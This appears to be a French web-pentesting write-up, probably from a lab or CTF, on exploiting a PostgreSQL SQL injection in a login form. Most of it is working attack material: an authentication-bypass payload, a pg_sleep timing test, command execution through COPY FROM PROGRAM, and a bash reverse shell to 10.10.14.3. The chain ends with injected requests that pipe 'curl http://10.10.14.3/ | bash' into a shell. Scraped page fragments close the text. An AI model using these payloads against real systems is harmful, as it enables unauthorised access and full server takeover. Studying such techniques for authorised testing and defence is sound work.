PostgreSQL Injection - Pentesting Web

PostgreSQL est un système de gestion de base de données relationnelle orienté objet puissant et open source qui est capable de prendre en charge en toute sécurité les charges de travail de données les plus complexes.

Lors de la soumission de ces identifiants :

username: '
password: '

Une erreur SQL apparaît, indiquant une base PostgreSQL avec pg_query.

Exploitation

Testez un payload d'injection classique :

username: ' OR 1=1-- -  
password: anything

On obtient accès au panel Dashboard administrateur.

Interceptez les requêtes avec Burp Suite et utilisez des ressources comme HackTricks pour ajuster les injections.

Page not found - HackTricksbook.hacktricks.xyz

Pour tester si l'injection permet l'exécution de commandes, utilisez :

;select pg_sleep(10);-- -

Si la réponse tarde 10 secondes, l'injection est exploitable.

Exécution de commandes

Voici un exemple pour obtenir une commande en ligne (RCE) :

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

Créez un fichier index.html contenant :

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.3/443 0>&1

Lancez un serveur HTTP :

python3 -m http.server 80

Configurez un listener :

nc -nvlp 443

Envoyez le payload :

username=';DROP TABLE IF EXISTS cmd_exec;-- -&password=d
username=';CREATE TABLE cmd_exec(cmd_output text);-- -&password=d
username=';COPY cmd_exec FROM PROGRAM 'curl http://10.10.14.3/ | bash';-- -&password=d

Mis à jour il y a 1 an

hashtagExploitation

hashtagPour tester si l'injection permet l'exécution de commandes, utilisez :

hashtagExécution de commandes

Exploitation

Pour tester si l'injection permet l'exécution de commandes, utilisez :

Exécution de commandes